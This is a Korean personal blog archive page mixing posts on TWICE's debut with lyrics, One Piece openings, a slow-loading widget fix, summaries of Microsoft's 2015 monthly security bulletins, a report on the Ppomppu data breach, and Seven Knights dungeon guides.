'분류 전체보기'에 해당되는 글 1765건



i n v i t a t i o n

티스토리 초대장

+ 남은 초대장 수 : 17

안녕하세요!

티스토리에 보금자리를 마련하시려는 여러분께 초대장을 배포해 드리려고 합니다.

나만의, 내 생각을, 내 기억을 담는 소중한 블로그를 만들고 싶다면 티스토리로 시작해보세요!

티스토리 블로그는 초대에 의해서만 가입이 가능합니다. 원하시는 분은 댓글에 E-mail 주소를 남겨주시면 

초대장을 보내드립니다. 남겨주실 때에는 꼭 비밀댓글로 남겨주세요!

초대장을 보내드리고 바로 개설하시지 않으신 분들은 초대장을 회수할 수도 있으니 바로 개설해주세요!

Yes
이런 분들께 드립니다!
1. 다른 블로그를 사용해보셨던 분
2. 이메일 주소가 정상적인 분
3. 블로그를 시작하려는 이유를 남겨주신 분!
No
이런 분들께 드리지 않아요!
1. 이메일 주소가 의심되는 분!
2. 이메일 주소를 남기지 않으신 분
3. 이유도 없이 달라고 하시는 분!
티스토리 이래서 좋아요!
1. 이미지, 동영상, 오디오, 파일까지! 무한 용량과 강력한 멀티미디어를 올릴 수 있어요!
2. 스킨위자드로 스킨을 내맘대로~ 거기에 기능 확장 플러그인까지!
3. 내가 원하는대로 myID.com으로 블로그 주소를 만들 수 있어요!
블로그 이미지

처리 

이것 저것 끄적여 보는 공간으로 만들었습니다.


처리의 블로그 마지막 글은 아래와 같이 2016년 9월 30일에 작성 된 글이다.

2016/09/30 - [자유로운글] - 현기증의 괴담, 실제 경험을 바탕으로 제작 된 "동행"편 출연

무려 2년 가까이 블로그가 죽어있었다 ㅠㅠ

업무도 많았지만 육아적인 부분도 무시하진 못한거 같다.

첫 째가 생기고 나서, 3년후에 둘 째가 태어나서 이제 막 8개월을 지나고 있으니 얼마나 힘들겠는가 ㅠㅠ



그래서 인지 방문자 통계를 봐도 많이 떨어져 있었다

(그래도 꾸준히 들어와주신 분들께 감사의 말씀을 전합니다 ^^/ )


이제는 좀 시간을 내서라도 블로그를 다시 해보려고 합니다.

여전히 보안 이외의 이것저것 끄적이는 공간으로 사용 할 예정이지만, 그래도 화이팅 해볼께요 ㅎㅎ



블로그 이미지

처리 

이것 저것 끄적여 보는 공간으로 만들었습니다.



올해 2월달에 제보를 한 내용이였는데 7개월이나 지나서 올리게 되네요;;

현기증의 괴담이라는 컨텐츠를 제작하고 있는 "현기증" 님의 블로그에 제보를 하였는데 운좋게 채택되어서
해당 내용이 유투브로 제작되었네요^^

그냥 뭐 공유 할 겸 해서 올립니다 ㅎㅎㅎ





블로그 이미지

처리 

이것 저것 끄적여 보는 공간으로 만들었습니다.



정말 오랫만에 올리는 포스팅이 원피스 오프닝 모음 2탄이 될줄이야 ㅡㅡ;;;

아주 예전에 2009년에 오프닝 12기까지 올린적이 있는데 요즘은 바뻐서 통 애니를 못 보고 있다 ㅠㅠ
(나의 애니는 어인섬이 끝 ㅠㅠ, 다시 다운로드 받아서 몰아봐야겠네요 ㅋㅋㅋㅋㅋ)

암튼 벌써 17기까지 나왔네요

소개할겸 해서^^ 올립니다
그리고 왜 1기씩 밀려있냐? 라는 분들이 있더라구요?

그건 원피스(OnePiece) 6기 오프닝(OP) : Brand New World 와
원피스(OnePiece) 7기 오프닝(OP) : Crazy Rainbow 사이에

원피스 7기 오프닝 ウィーアー!(We are!_성우ver) <- 요걸 저는 7기로 치지 않았습니다!!
그래서 생각하시는것보다 1기씩 낮을 수도 있습니다^^


- 원피스(OnePiece) 13기 오프닝(OP) : Fight Together
에이스, 사보, 루피의 과거이야기와 동료들의 행방 이야기가 중심이라고 한다.
여기서부터 나의 원피스 애니가 끊어지는 바람에 ㅠㅠ 
검색해서 내용을 올림;; 그래도 네타는 계속 보고 있으니 내용은 이어진다 ㅎㅎ



- 원피스(OnePiece) 14기 오프닝(OP) : We Go
샤봉디 제도에서 밀집모자 동료들과의 재회를 담고 있는 에피소드 입니다^^
재회답게 오프닝에서도 동료들을 하나씩 소개해주고 있습니다.
또한 어인섬도 여기에 포함이 됩니다^^



- 원피스(OnePiece) 15기 오프닝(OP) : Hands Up
어인섬 후반부와 펑크해저드의 시작을 담고 있습니다^^


- 원피스(OnePiece) 16기 오프닝(OP) : Wake Up
펑크해저드의 내용과 드레스로자의 시작 부분을 담고 있습니다.
계속 진행중이죠^^ 
그나저나 언제 여기까지 다 보려나 ㅠㅠ



블로그 이미지

처리 

이것 저것 끄적여 보는 공간으로 만들었습니다.






JYP 신인 걸그룹 트와이스가 데뷔곡 "우-아하게(OOH-AHH하게)"로 가요계 정식 데뷔했다. 

트와이스는 JYP엔터테인먼트가 미쓰에이 이후 5년 만에 선보이는 걸그룹이다.


이미 알만한 사람은 다 알겠지만, 

케이블채널 Mnet에서 방영한 데뷔 서바이벌 프로그램 "식스틴"과 네이버 TV캐스트 "트와이스 TV"를 통해서 얼굴을 많이 알렸다.


이런 마케팅을 통해 데뷔 후에도 친근하게 다가올 수 있는 것 같다.


트와이스(Twice)는 나연, 정연, 모모, 사나, 지효(리더), 미나, 다현, 채영, 쯔위으로 총 9명으로 구성되어 있다.






트와이스(Twice)의 자세한 사항은 아래의 사이트에서 확인하시고, 우린 뮤직비디오나 봅시다.

- TWICE Official Homepage : http://TWICE.jype.com


- TWICE Official Facebook : http://www.facebook.com/JYPETWICE


- TWICE Official Twitter : http://www.twitter.com/JYPETWICE


- TWICE Official Instagram : http://instagram.com/twicetagram


- TWICE Fan's : http://fans.jype.com/TWICE




트와이스(Twice), 1번재 미니앨범 타이틀곡 "우-아하게(OOH-AHH하게)" 뮤직비디오
(※ 뮤직비디오는 1080P로 봐야 제맛이다!! 알지요?!)



트와이스(Twice), 1번재 미니앨범 타이틀곡 "우-아하게(OOH-AHH하게)" 가사

모두 나를 가지고

매일 가만 안 두죠

내가 너무 예쁘죠

나 때문에 다 힘들죠

어딜 걷고 있어도

빨간 바닥인거죠

Red carpet 같은 기분

모두 날 쳐다 보죠 oh


어떤 사람은 어머님이 누구냐고

신선하게 말 걸어도

아무 느낌이 안 들죠

하지만 나도 누군가 하고 사랑에

빠져보고 싶어 Baby

잘 들어요 내 Boy


단 한번도 느껴본 적 없는 걸

알게 해주는 

(사람 기다리고 있는 걸)

얼마가 돼도 기다리고 싶어

I just wanna fall in love


어떻게 내가 움직일 수 없게 

날 Ooh Ahh Ooh Ahh 하게 만들어줘

가짜 가짜 진심 없는 가짜 

잘 가 잘 가 Huh

(OOH-AHH하게)

어떻게 이제 더 할말이 없게 

날 Ooh Ahh Ooh Ahh 하게 만들어줘

Bla La La La 말만하지 말고 

느껴지게 Huh

(OOH-AHH하게)


날 봐 거봐 또 두 번 봐

한번 지나치고 등을 돌려 쳐다봐 (TWICE)

어딜 가더라도 항상 민 낯

하지만 내가 제일 빛나

낮은 신발 신어도 가치는 High


머릿속엔 늘 영화 속 같은 La La La

장면들이 지나가네 생각만해도 떨리네 yeah

이제는 나도 누군가 하고 사랑에 

빠져 보고 싶어 Baby

잘 들어요 내 Boy


아무하고 만나 시작하기 싫어 

쉽지 않은 여자 그게 나인걸 


Let me see

How you gon treat me

I ain’t no easy

Better think about it TWICE



트와이스(Twice), 1번재 미니앨범 갤러리












블로그 이미지

처리 

이것 저것 끄적여 보는 공간으로 만들었습니다.



요즘 통 블로그를 안해서 잘 몰랐다....


내 블로그가 이렇게 느리게 로딩되고 있는줄은 ㅠㅠ


그래서 "울지않는 벌새"님에게 부탁해서 어떤 위치에서 로딩이 느린지 확인을 부탁드렸다.

원인을 찾게 해주셔서 감사의 말씀을 올립니다 (__)


확인결과 AD(광고)서버가 아닌, 다음 위젯서버에서 원인이 발견되었다.

위젯 중에서도 "한RSS 구독자수" 위젯에서 구독자수를 서버로 요청하느라 로딩이 느린 것으로 추측된다.

(더이상 운영하지 않는 서비스라 그럴 가능성이 매우 높아 보임;;)

http://widgetprovider.daum.net/view?url=http://widgetcfs1.daum.net/xml/15/widget/2008/10/08/11/57/48ec219fd28f1.xml&scrap=1&widgetId=128&title=한RSS+구독자수&up_DAUM_WIDGETBANK_RSS_URL=http%3A%2F%2Fkjcc2.tistory.com%2Frss&height=60&width=166&

up_pref_banner_type=5&up_pref_banner_color=%23&up_pref_RSS_URL=DAUM_WIDGETBANK_RSS_URL&border=simple&


그래서 바로 관리로 들어가서 사이드바2에 위차한 "한RSS 구독자수" 위젯을 바로 삭제했다.


해당 위젯을 삭제하고 나니 놀라운 속도가 ㅠㅠ


그래서 영상으로 준비함 ㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋ


아래의 영상은 "한RSS 구독자수" 위젯이 있을 때의 로딩 속도이다.

약 30초 후에 블로그가 열린다.



아래의 영상은 "한RSS 구독자수" 위젯을 삭제 했을 때의 로딩 속도이다.

빨라서 못느끼실 수 있지만, 새로고침 3번을 했다;;




블로그 이미지

처리 

이것 저것 끄적여 보는 공간으로 만들었습니다.




마이크로소프트(Microsoft)에서 매월 정기적으로 제공하는 2015년 10월 정기 보안 업데이트가 발표 되었습니다.


이번 업데이트에서는 Microsoft Windows, Internet Explorer, Microsoft Edge, Microsoft Office, 

Microsoft Office Services 및 Web Apps, Microsoft Server 소프트웨어 제품군에서 

발견된 안취약점(33건)을 해결한 6건의 보안 패치(긴급 3, 중요 3)로 이루어져 있습니다.




※ 최신 버전이 아닌 상태에서 해당 제품 사용시 "공개된 취약점을 이용한 신종 악성코드" 등 보안 위협에 쉽게 노출될 수 있으니, 
해당 제품을 사용하시는 사용자들은 아래의 해결책을 참고해서 최신 버전으로 업데이트 후 사용바랍니다.


※ 아래의 링크를 클릭하면 해당 취약점에 대한 정보를 볼 수 있다.

1. MS15-106 (긴급) : Internet Explorer용 누적 보안 업데이트(3096441)

이 보안 업데이트는 Internet Explorer의 취약성을 해결합니다. 이 중에서 가장 심각한 취약성은 사용자가 Internet Explorer를 사용하여 특수 제작된 웹 페이지를 볼 경우 원격 코드 실행을 허용할 수 있습니다. 이 취약성 악용에 성공한 공격자는 현재 사용자와 동일한 권한을 얻을 수 있습니다. 시스템에 대한 사용자 권한이 적게 구성된 계정의 고객은 관리자 권한으로 작업하는 고객에 비해 영향을 적게 받습니다.

- 다양한 메모리 손상 취약성:

  CVE-2015-6042, CVE-2015-6048, CVE-2015-6049, CVE-2015-6050

- 다양한 스크립팅 엔진 메모리 손상 취약성:

  CVE-2015-2482, CVE-2015-6055, CVE-2015-6056

- 다양한 Internet Explorer 권한 상승 취약성:

  CVE-2015-6044, CVE-2015-6047, CVE-2015-6051

- 다양한 Internet Explorer 정보 유출 취약성:

  CVE-2015-6046, CVE-2015-6053

- VBScript 및 JScript ASLR 우회(CVE-2015-6052)

- 스크립팅 엔진 정보 유출 취약성(CVE-2015-6059)


2. MS15-107 (중요) : Microsoft Edge용 누적 보안 업데이트(3096448)

이 보안 업데이트는 Microsoft Edge의 취약성을 해결합니다. 이 중에서 가장 심각한 취약성은 사용자가 Microsoft Edge를 사용하여 특수 제작된 웹 페이지를 볼 경우 정보 유출을 허용할 수 있습니다. 이 취약성 악용에 성공한 공격자는 현재 사용자와 동일한 권한을 얻을 수 있습니다. 시스템에 대한 사용자 권한이 적게 구성된 계정의 고객은 관리자 권한으로 작업하는 고객에 비해 영향을 적게 받습니다.

- Microsoft Edge 정보 유출 취약성(CVE-2015-6057)

- Microsoft Edge XSS 필터 우회(CVE-2015-6058)


3. MS15-108 (긴급) : 원격 코드 실행을 해결하기 위한 JScript 및 VBScript에 대한 보안 업데이트(3089659)

이 보안 업데이트는 Microsoft Windows의 VBScript 및 JScript 스크립팅 엔진의 취약성을 해결합니다. 이 중에서 가장 심각한 취약성은 공격자가 Internet Explorer를 통해 취약성을 악용하도록 디자인된 특수 제작된 웹 사이트를 호스트(또는 사용자가 제공한 콘텐츠나 광고를 허용하거나 호스트하는 웹 사이트나 공격에 노출된 웹 사이트 이용)한 다음 사용자가 이 웹 사이트를 보도록 유도하는 경우 원격 코드 실행을 허용할 수 있습니다. 또한 공격자는 사용자가 특수 제작된 웹 사이트로 이동하도록 IE 렌더링 엔진을 사용하는 Microsoft Office 문서 또는 응용 프로그램에 "초기화하기 안전"이라고 표시된 ActiveX 컨트롤을 포함시킬 수 있습니다.

이 취약성 악용에 성공한 공격자는 현재 사용자와 동일한 사용자 권한을 얻을 수 있습니다. 그리고 현재 사용자가 관리자 권한으로 로그온한 경우 공격자가 영향받는 시스템을 제어할 수 있습니다. 이렇게 되면 공격자가 프로그램을 설치하거나, 데이터를 보거나 변경하거나 삭제하거나, 모든 사용자 권한이 있는 새 계정을 만들 수 있습니다. 

- 스크립팅 엔진 메모리 손상 취약성(CVE-2015-2482)

- VBScript 및 JScript ASLR 우회(CVE-2015-6052) 

- 스크립팅 엔진 메모리 손상 취약성(CVE-2015-6055)

- 스크립팅 엔진 정보 유출 취약성(CVE-2015-6059)


4. MS15-109 (긴급) : 원격 코드 실행을 해결하기 위한 Windows Shell에 대한 보안 업데이트(3096443)

이 보안 업데이트는 Microsoft Windows의 취약성을 해결합니다. 사용자가 Windows에서 특수 제작된 도구 모음 개체를 열거나 공격자가 사용자에게 특수 제작된 콘텐츠를 온라인으로 보도록 유도하는 경우 이 취약성으로 인해 원격 코드 실행이 허용될 수 있습니다. 

- 도구 모음 해제 후 사용 취약성(CVE-2015-2515)

- Microsoft 태블릿 입력 밴드 해제 후 사용 취약성(CVE-2015-2548)


5. MS15-110 (중요) : 원격 코드 실행을 해결하기 위한 Microsoft Office에 대한 보안 업데이트(3096440)

이 보안 업데이트는 Microsoft Office의 취약성을 해결합니다. 이 중에서 가장 심각한 취약성은 사용자가 특수 제작된 Microsoft Office 파일을 열 경우 원격 코드 실행을 허용할 수 있습니다. 이러한 취약성 악용에 성공한 공격자는 현재 사용자의 컨텍스트에서 임의의 코드를 실행할 수 있습니다. 시스템에 대한 사용자 권한이 적게 구성된 계정의 고객은 관리자 권한으로 작업하는 고객에 비해 영향을 적게 받습니다.

- Microsoft Office 메모리 손상 취약성(CVE-2015-2555)

- Microsoft Office 메모리 손상 취약성(CVE-2015-2557)

- Microsoft Office 메모리 손상 취약성(CVE-2015-2558)


6. MS15-111 (중요) : 권한 상승을 해결하기 위한 Windows 커널에 대한 보안 업데이트(3096447)

이 보안 업데이트는 Microsoft Windows의 취약성을 해결합니다. 이러한 취약성 중 더 위험한 취약성으로 인해 공격자가 영향받는 시스템에 로그온하여 특수 제작된 응용 프로그램을 실행할 경우 권한 상승이 허용될 수 있습니다. 

이 보안 업데이트는 Windows 커널이 메모리에서 개체를 처리하는 방식을 수정하고, Windows가 접합 및 탑재 지점 만들기와 관련한 특정 시나리오를 처리하는 방식을 수정하고, Windows가 BCD(부팅 구성 데이터)를 구문 분석하는 방식을 개선하여 취약성을 해결합니다.

- Windows 커널 메모리 손상 취약성(CVE-2015-2549)

- Windows 권한 상승 취약성(CVE-2015-2550)

- 신뢰할 수 있는 부팅 보안 기능 우회 취약성(CVE-2015-2552)

- Windows 탑재 지점 권한 상승 취약성(CVE-2015-2553)

- Windows 개체 참조 권한 상승 취약성(CVE-2015-2554)




블로그 이미지

처리 

이것 저것 끄적여 보는 공간으로 만들었습니다.






국내 최대 규모의 휴대폰 커뮤니티 뽐뿌(PPOMPPU) 사이트가 개인정보 약 190만건이 해킹 된 사실이 2015-09-141일 확인되었다.


이번 해킹의 원인은 국내인으로 추정되는 해커에 의해 제로보드 취약점을 이용한 SQL Injection 공격으로 발생되었다고 한다.


이 공격으로 인해 유출 된 개인정보는 아래와 같다.

"회원 정보 ID, 닉네임, 암호화 된 비밀번호, 생년월일, 이메일 주소, 암호화 된 장터 비밀번호, 회원 가입일, 회원 점수


이번 뿜뿌 해킹사건에는 개인정보 뿐만 아니라 이번 해킹으로 인해 악성 어플리케이션(APK)가 추가로 다운로드 되는 

내용도 존재했다.


관련 내용들은 아래의 링크에 자세하게 설명되어 있으니 참고하자^^



□ 뽐뿌 개인정보 유출 관련 내용


현재 뽐뿌에서는 홈페이지에 유출에 관한 공지사항을 팝업으로 알려주고 있다.



블로그 이미지

처리 

이것 저것 끄적여 보는 공간으로 만들었습니다.




마이크로소프트(Microsoft)에서 매월 정기적으로 제공하는 2015년 9월 정기 보안 업데이트가 발표 되었습니다.


이번 업데이트에서는 Microsoft Windows, Internet Explorer, Microsoft Edge, Microsoft Office, Microsoft Lync, 

Microsoft SharePoint Foundation, Microsoft .NET Framework, Microsoft Exchange Server, 비즈니스용 Skype 서버, 

Microsoft Lync Server 제품군에서 발견된 안취약점(55건)을 해결한 12건의 보안 패치(긴급 4, 중요 8)로 이루어져 있습니다.




※ 최신 버전이 아닌 상태에서 해당 제품 사용시 "공개된 취약점을 이용한 신종 악성코드" 등 보안 위협에 쉽게 노출될 수 있으니, 
해당 제품을 사용하시는 사용자들은 아래의 해결책을 참고해서 최신 버전으로 업데이트 후 사용바랍니다.


※ 아래의 링크를 클릭하면 해당 취약점에 대한 정보를 볼 수 있다.

1. MS15-094 (긴급) : Internet Explorer용 누적 보안 업데이트(3089548)

이 보안 업데이트는 Internet Explorer의 취약성을 해결합니다. 이 중에서 가장 심각한 취약성은 사용자가 Internet Explorer를 사용하여 특수 제작된 웹 페이지를 볼 경우 원격 코드 실행을 허용할 수 있습니다. 이 취약성 악용에 성공한 공격자는 현재 사용자와 동일한 권한을 얻을 수 있습니다. 

- 다양한 메모리 손상 취약성:

  CVE-2015-2485, CVE-2015-2486, CVE-2015-2487, CVE-2015-2490, CVE-2015-2491

  CVE-2015-2492, CVE-2015-2494, CVE-2015-2498, CVE-2015-2499, CVE-2015-2500

  CVE-2015-2501, CVE-2015-2541, CVE-2015-2542


2. MS15-095 (긴급) : Microsoft Edge용 누적 보안 업데이트(3089665)  

이 보안 업데이트는 Microsoft Edge의 취약성을 해결합니다. 이 중에서 가장 심각한 취약성은 사용자가 Microsoft Edge를 사용하여 특수 제작된 웹 페이지를 볼 경우 원격 코드 실행을 허용할 수 있습니다. 이 취약성 악용에 성공한 공격자는 현재 사용자와 동일한 권한을 얻을 수 있습니다. 

- 다양한 메모리 손상 취약성:

  CVE-2015-2485, CVE-2015-2486, CVE-2015-2494, CVE-2015-2542


3. MS15-096 (중요) : Active Directory 서비스의 취약성으로 인한 서비스 거부 문제(3072595)

이 보안 업데이트는 Active Directory의 취약성을 해결합니다. 이 취약성으로 인해 인증된 공격자가 여러 컴퓨터 계정을 만드는 경우 서비스 거부가 허용될 수 있습니다. 이 취약성을 악용하려면 공격자가 도메인에 컴퓨터를 가입시킬 권한이 있는 계정을 가지고 있어야 합니다. 

- Active Directory 서비스 거부 취약성(CVE-2015-2535)


4. MS15-097 (긴급) : Microsoft 그래픽 구성 요소의 취약성으로 인한 원격 코드 실행 문제(3089656)

이 보안 업데이트는 Microsoft Windows, Microsoft Office 및 Microsoft Lync의 취약성을 해결합니다. 이 중에서 가장 심각한 취약성은 사용자가 특수 제작된 문서를 열거나 포함된 OpenType 글꼴이 있는 신뢰할 수 없는 웹 페이지를 방문하는 경우 원격 코드 실행을 허용할 수 있습니다. 

- OpenType 글꼴 구문 분석 취약성(CVE-2015-2506)

- 다양한 글꼴 드라이버 권한 상승 취약성:

  CVE-2015-2507, CVE-2015-2508, CVE-2015-2512


5. MS15-098 (긴급) : Windows 필기장의 취약성으로 인한 원격 코드 실행 문제(3089669)

이 보안 업데이트는 Microsoft Windows의 취약성을 해결합니다. 이 중 보다 심각한 취약성은 사용자가 특수 제작된 필기장 파일을 열 경우 원격 코드 실행을 허용할 수 있습니다.

- 다양한 Windows 필기장 RCE 취약성:

  CVE-2015-2513, CVE-2015-2514, CVE-2015-2519, CVE-2015-2530


6. MS15-099 (긴급) : Microsoft Office의 취약성으로 인한 원격 코드 실행 문제(3089664)

이 보안 업데이트는 Microsoft Office의 취약성을 해결합니다. 이 중에서 가장 심각한 취약성은 사용자가 특수 제작된 Microsoft Office 파일을 열 경우 원격 코드 실행을 허용할 수 있습니다. 이러한 취약성 악용에 성공한 공격자는 현재 사용자의 컨텍스트에서 임의의 코드를 실행할 수 있습니다.

- 다양한 Microsoft Office 메모리 손상 취약성:

  CVE-2015-2520, CVE-2015-2521, CVE-2015-2523

- Microsoft SharePoint XSS 스푸핑 취약성(CVE-2015-2522)

- Microsoft Office 잘못된 형식의 EPS 파일 취약성(CVE-2015-2545)


7. MS15-100 (중요) : Windows Media Center의 취약성으로 인한 원격 코드 실행 문제(3087918) 

이 보안 업데이트는 Microsoft Windows의 취약성을 해결합니다. Windows Media Center가 악성 코드를 참조하는 특수 제작된 Media Center 링크(.mcl) 파일을 여는 경우 이 취약성으로 인해 원격 코드 실행이 허용될 수 있습니다. 이 취약성 악용에 성공한 공격자는 현재 사용자와 동일한 사용자 권한을 얻을 수 있습니다.

- Windows Media Center RCE 취약성(CVE-2015-2509)


8. MS15-101 (중요) : .NET Framework의 취약성으로 인한 권한 상승 문제(3089662)

이 보안 업데이트는 Microsoft .NET Framework의 취약성을 해결합니다. 이 중에서 가장 심각한 취약성은 사용자가 특수 제작된 .NET 응용 프로그램을 실행할 경우 권한 상승을 허용할 수 있습니다. 하지만 어떠한 경우에도 공격자는 강제로 사용자가 이 응용 프로그램을 실행하도록 만들 수 없습니다. 공격자는 사용자가 이렇게 하도록 유도해야 합니다. 

- .NET 권한 상승 취약성(CVE-2015-2504)

- MVC 서비스 거부 취약성(CVE-2015-2526)


9. MS15-102 (중요) : Windows 작업 관리의 취약성으로 인한 권한 상승 문제(3089657)

이 보안 업데이트는 Microsoft Windows의 취약성을 해결합니다. 공격자가 시스템에 로그온하고 특수 제작된 응용 프로그램을 실행할 경우 이 취약성으로 인해 권한 상승이 허용될 수 있습니다.

이 보안 업데이트는 Windows가 가장 이벤트에 대한 유효성을 검사하는 방식 및 작업 스케줄러가 파일 시스템 상호 작용을 확인하는 방식을 수정하여 취약성을 해결합니다.

- Windows 작업 관리 권한 상승 취약성(CVE-2015-2524)

- Windows 작업 파일 삭제 권한 상승 취약성(CVE-2015-2525)

- Windows 작업 관리 권한 상승 취약성(CVE-2015-2528)


10. MS15-103 (중요) : Microsoft Exchange Server의 취약성으로 인한 정보 유출 문제(3089250)

이 보안 업데이트는 Microsoft Exchange Server의 취약성을 해결합니다. 이 중에서 가장 심각한 취약성은 OWA(Outlook Web Access )가 적절히 웹 요청을 처리하고 사용자 입력 및 전자 메일 콘텐츠를 삭제하지 못하는 경우 정보 유출을 허용할 수 있습니다. 

이 보안 업데이트는 Microsoft Exchange OWA가 웹 요청을 처리하는 방식을 수정하고 OWA가 제대로 사용자 입력 및 전자 메일 콘텐츠를 삭제하도록 하여 취약성을 해결합니다.

- Exchange 정보 유출 취약성(CVE-2015-2505)

- 다양한 Exchange 스푸핑 취약성: CVE-2015-2543, CVE-2015-2544


11. MS15-104 (중요) : 비즈니스용 Skype 서버 및 Lync Server의 취약성으로 인한 권한 상승 문제(3089952)

이 보안 업데이트는 비즈니스용 Skype 서버 및 Microsoft Lync Server의 취약성을 해결합니다. 이 중에서 가장 심각한 취약성은 사용자가 특수 제작된 URL을 클릭할 경우 권한 상승을 허용할 수 있습니다. 공격자는 특수 제작된 URL을 통해 사용자를 영향받는 웹 사이트로 유인하는 인스턴트 메신저 또는 전자 메일 메시지의 링크를 클릭하도록 유도해야 합니다.

이 보안 업데이트는 비즈니스용 Skype 서버 및 Lync Server의 jQuery를 업데이트하여 사용자 입력을 제대로 삭제하고 비즈니스용 Skype 서버 및 Lync Server가 사용자 입력을 삭제하는 방식을 수정하여 취약성을 해결합니다.

- 비즈니스용 Skype 서버 및 Lync Server XSS 정보 유출 취약성(CVE-2015-2531)

- Lync Server XSS 정보 유출 취약성(CVE-2015-2532)

- 비즈니스용 Skype 서버 및 Lync Server XSS 권한 상승 취약성(CVE-2015-2536)


12. MS15-105 (중요) : Windows Hyper-V의 취약성으로 인한 보안 기능 우회 문제(3091287)

이 보안 업데이트는 Microsoft Windows의 취약성을 해결합니다. 공격자가 Windows Hyper-V에서 부적절하게 ACL(액세스 제어 목록) 구성 설정을 적용하게 할 수 있는 특수 제작된 응용 프로그램을 실행하는 경우 이 취약성으로 인해 보안 기능 우회가 허용될 수 있습니다. Hyper-V 역할을 사용하지 않는 고객은 영향을 받지 않습니다.

이 보안 업데이트는 Hyper-V가 ACL 구성 설정을 적용하는 방식을 수정하여 취약성을 해결합니다.

- Hyper-V 보안 기능 우회 취약성(CVE-2015-2534)





블로그 이미지

처리 

이것 저것 끄적여 보는 공간으로 만들었습니다.




국내 게임 유명 게임회사인 넷마블게임즈에서 개발한 모바일 액션 RPG 게임 "세븐나이츠"의 컨텐츠 중의 

하나 인 요일 던전에 대해서 공략을 해보려 한다.


우선 요일던전이란건 월,화,수,목,금,토,일 에 해당하는 던전이다.

각 요일마다, 쉬움, 보통, 어려움, 극악의 난이도를 선택 하여 클리어 시 원하는 원소를 획득 할 수 있는 컨텐츠 이다.



물론 보상은 각각 다르다.

쉬움 난이도에서는 1성 원소

보통 난이도에서는 2성 원소

어려움 난이도에서는 3성 원소

극악 난이도에서는 4성 원소를 획득 할 수 있다.


보편적으로 세븐나이츠를 시작하고 약 2주일 정도면, 어려움까지는 무리없이 깰 수 있지만

극악 던전은 어느정도 덱(파티)가 꾸려져야 할 수 있기 때문에 최대한 쉬운 방법으로 다들 극악 난이도를 

클리어하려고 난리다 ㅠㅠ


"내가 공략하는 방법이 정답은 아니다.
다만, 쉽게 할 수 있는 방법도 모를 수 있는 분들이 있기에 방법을 제시하는 것이기 때문에 태글 걸지 말자!!"



오늘 공략 할 던전은 바로 요일 던전이다. 

월요일 극악 난이도는 위에 보이듯이 쥬피, 아리엘, 헤브니아, 헬레니아, 에반 영웅으로 이루어져 있으며, 

클리어시 땅 4성 원소를 획득 가능하다.



이번 상대방 영웅에서 조심해야 할 점을 알아보겠습니다.


쥬피는 조심해야할 건 없고, 매턴마다 쥬피가 저격자세를 취해주면 떙큐죠 ㅎㅎㅎ


아리엘도 크게 문제는 없습니다.

하지만 패시브가 치확 확률업이라~ ㅠㅠ 

먼저 죽이는게 좋습니다. 물몸이라 죽이기도 쉽구요 ㅎㅎㅎ



월요일 던전에서 가장 어려운 상대;;

패시브가 3턴 면역이라 관통으로 죽여야 하는 ㅠㅠ

그리고 스킬 중 3턴감이 있어서 무섭습니다^^; 



헬레니아는 도발스킬이 시전되면, 아주 껄끄러운 상대입니다.

만약 도발스킬이 문제라면 에이스의 전체공격으로 해제할 수 있습니다!!



에반은 리메이크 되고 나서 좀 까다로워졌죠;;

특히 돌격은 상대방을 기절시킬 수 있으니 ㅠㅠ

마찬가지고 방어막을 펼치면 에이스의 전체공격으로 해제 후에 때려주시면 편해요



플스는 아래와 같이 공격형 형식으로 선택을 했다.

게임에서 정해주는 "공격형 설정" 은 아니니 헷갈리지 말길~!!






덱은 제이브 보진 // 소교, 아일린, 에이스, 델론즈 로 구성했습니다.

영웅 별 렙은 아래 써있으니 패스하도록 하자~!!

(예전에 찍어둔거라....장비들이 좀 구리네요 ㅋㅋㅋㅋㅋ 영웅레벨도 낮고 ㅠㅠ)









스킬트리는 아래와 같습니다.


1 라운드 : 제이브 용분으로 마무리

(제이브 용분으로 1마리도 못죽인다면 ㅠㅠ 현덱으로는 깨기 어려움)


2 라운드 : 제이브 분격으로 2~3마리 잡고, 델론즈 침묵 스킬 "사신강림"으로 헤브니아, 헬레니아, 에반등을 침묵,

           그리고 소교 3인 관으로 마무리

           (분격은 관통계열이라 헤브니아가 죽으면 참 좋습니다 ㅋㅋ)


3 라운드 : 제이브 용분으로 2~3마리 잡고, 델론즈 침묵 스킬 "사신강림" 으로 침묵, 그리고 제이브 분격으로 마무리


※ 소교 3인 관통 스킬은 상황에 따라 적적하게 사용하세요, 제이브 스킬이 치명이 많이 터지면 그냥 죽이는 수도 있으니^^



위 내용을 간략하게 정리 해드리겠습니다.


1라 : 제이브 용분 -> 마무리

2라 : 제이브 분격 -> 델론즈 침묵 -> 소교 관통 -> 마무리

3라 : 제이브 용분 -> 델론즈 침묵 -> 제이브 분격 -> 소교 관통 -> 마무리


오늘도 참 쉽죠~!!?




블로그 이미지

처리 

이것 저것 끄적여 보는 공간으로 만들었습니다.




국내 게임 유명 게임회사인 넷마블게임즈에서 개발한 모바일 액션 RPG 게임 "세븐나이츠"의 컨텐츠 중의 

하나 인 요일 던전에 대해서 공략을 해보려 한다.


우선 요일던전이란건 월,화,수,목,금,토,일 에 해당하는 던전이다.

각 요일마다, 쉬움, 보통, 어려움, 극악의 난이도를 선택 하여 클리어 시 원하는 원소를 획득 할 수 있는 컨텐츠 이다.



물론 보상은 각각 다르다.

쉬움 난이도에서는 1성 원소

보통 난이도에서는 2성 원소

어려움 난이도에서는 3성 원소

극악 난이도에서는 4성 원소를 획득 할 수 있다.


보편적으로 세븐나이츠를 시작하고 약 2주일 정도면, 어려움까지는 무리없이 깰 수 있지만

극악 던전은 어느정도 덱(파티)가 꾸려져야 할 수 있기 때문에 최대한 쉬운 방법으로 다들 극악 난이도를 

클리어하려고 난리다 ㅠㅠ


"내가 공략하는 방법이 정답은 아니다.
다만, 쉽게 할 수 있는 방법도 모를 수 있는 분들이 있기에 방법을 제시하는 것이기 때문에 태글 걸지 말자!!"



오늘 공략 할 던전은 바로 요일 던전이다. 

금요일 극악 난이도는 위에 보이듯이 소이, 무송, 링링 영웅으로 이루어져 있으며, 클리어시 불 4성 원소를 획득 가능하다.


목요일 던전처럼 파스칼로 깨면 쉽지 않나 싶기도 하지만, 파스칼은 1명씩 나오는 요일에만 용이하기 때문에 ㅠㅠ


그럼 이번 상대방 영웅에서 조심해야 할 점을 알아보겠습니다.


소이는 전체공격 방어가 있기 때문에 5인 공격영웅은 의미가 없습니다.


무송은 가장 무서운 전체 기절 스킬을 주의해야합니다.

